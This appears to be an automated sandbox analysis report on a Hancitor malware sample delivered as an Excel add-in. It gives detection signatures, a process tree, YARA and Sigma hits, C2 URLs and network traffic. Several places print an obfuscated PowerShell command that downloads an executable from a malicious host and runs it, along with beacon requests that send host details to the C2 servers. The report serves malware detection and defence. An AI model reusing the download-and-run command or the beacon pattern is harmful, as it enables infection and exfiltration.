Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 0708_5355150121.xll

Overview

General Information

Sample Name:0708_5355150121.xll
Analysis ID:445958
MD5:41e0318dfdb1c180a375a7efc712649e
SHA1:f0c230010c7b85544c25879d4daf74479360e1bc
SHA256:73b8c566d8cdf3200daa0b698b9d32a49b1ea8284a1e6aa6408eb9c9daaacb71
Tags:dllxll
Infos:

Most interesting Screenshot:

Detection

Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Hancitor
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
May check the online IP address of the machine
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6120 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde MD5: 5D6638F2C8F8571C593999C58866007E)
    • mshta.exe (PID: 5756 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
      • powershell.exe (PID: 5944 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5788 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • snd32sys.exe (PID: 2160 cmdline: 'C:\Users\Public\snd32sys.exe' MD5: ED1921467F6784AF6BDCA40A06A541B5)
  • cleanup

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x18c6a:$s1: poWerSHEll
00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xeee:$s1: poWerSHEll
  • 0x1256:$s1: PowerShell
  • 0x1256:$sr1: PowerShell
  • 0x1256:$sn3: PowerShell
00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1563:$s1: powershell
  • 0x1572:$s1: poWerSHEll
  • 0x1563:$sr1: powershell
  • 0x1563:$sn1: powershell
Click to see the 6 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
16.3.snd32sys.exe.12f4305.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
    16.3.snd32sys.exe.12f4305.0.unpackHancitorHancitor Payloadkevoreilly
    • 0x54f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
    16.3.snd32sys.exe.12f4305.0.raw.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
      16.3.snd32sys.exe.12f4305.0.raw.unpackHancitorHancitor Payloadkevoreilly
      • 0x114f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
      16.2.snd32sys.exe.610000.0.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
        Click to see the 1 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Execution from Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\snd32sys.exe' , CommandLine: 'C:\Users\Public\snd32sys.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\snd32sys.exe, NewProcessName: C:\Users\Public\snd32sys.exe, OriginalFileName: C:\Users\Public\snd32sys.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5944, ProcessCommandLine: 'C:\Users\Public\snd32sys.exe' , ProcessId: 2160
        Sigma detected: MSHTA Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6120, ProcessCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ProcessId: 5756
        Sigma detected: Mshta Spawning Windows ShellShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944
        Sigma detected: Non Interactive PowerShellShow sources
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5756, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe', ProcessId: 5944

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "0707in2_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}
        Multi AV Scanner detection for submitted fileShow sources
        Source: 0708_5355150121.xllVirustotal: Detection: 23%Perma Link
        Source: 0708_5355150121.xllReversingLabs: Detection: 17%
        Source: 16.2.snd32sys.exe.610000.0.unpackAvira: Label: TR/Dropper.Gen

        Location Tracking:

        barindex
        Yara detected HancitorShow sources
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612CB0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612CF7 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612D58 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00612D35 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,

        Compliance:

        barindex
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\Public\snd32sys.exeUnpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
        Source: 0708_5355150121.xllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose,
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00657FD2 FindFirstFileExW,

        Software Vulnerabilities:

        barindex
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: http://sudepallon.com/8/forum.php
        Source: Malware configuration extractorURLs: http://anspossthrly.ru/8/forum.php
        Source: Malware configuration extractorURLs: http://thentabecon.ru/8/forum.php
        Downloads files with wrong headers with respect to MIME Content-TypeShow sources
        Source: httpImage file has PE prefix: HTTP/1.1 200 OK Server: nginx Date: Thu, 08 Jul 2021 14:30:58 GMT Content-Type: image/jpeg Content-Length: 763392 Connection: keep-alive Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT ETag: "60e5ade0-ba600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        May check the online IP address of the machineShow sources
        Source: C:\Users\Public\snd32sys.exeDNS query: name: api.ipify.org
        Source: C:\Users\Public\snd32sys.exeDNS query: name: api.ipify.org
        Source: C:\Users\Public\snd32sys.exeDNS query: name: api.ipify.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 08 Jul 2021 14:30:58 GMTContent-Type: image/jpegContent-Length: 763392Connection: keep-aliveLast-Modified: Wed, 07 Jul 2021 13:36:32 GMTETag: "60e5ade0-ba600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
        Source: global trafficHTTP traffic detected: GET /92375234.xml HTTP/1.1Connection: Keep-AliveHost: srand04rf.ru
        Source: Joe Sandbox ViewIP Address: 23.21.173.155 23.21.173.155
        Source: Joe Sandbox ViewIP Address: 77.222.42.67 77.222.42.67
        Source: Joe Sandbox ViewASN Name: SWEB-ASRU SWEB-ASRU
        Source: global trafficHTTP traffic detected: GET /08.jpg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: srand04rf.ruConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
        Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 122Cache-Control: no-cacheData Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29 Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
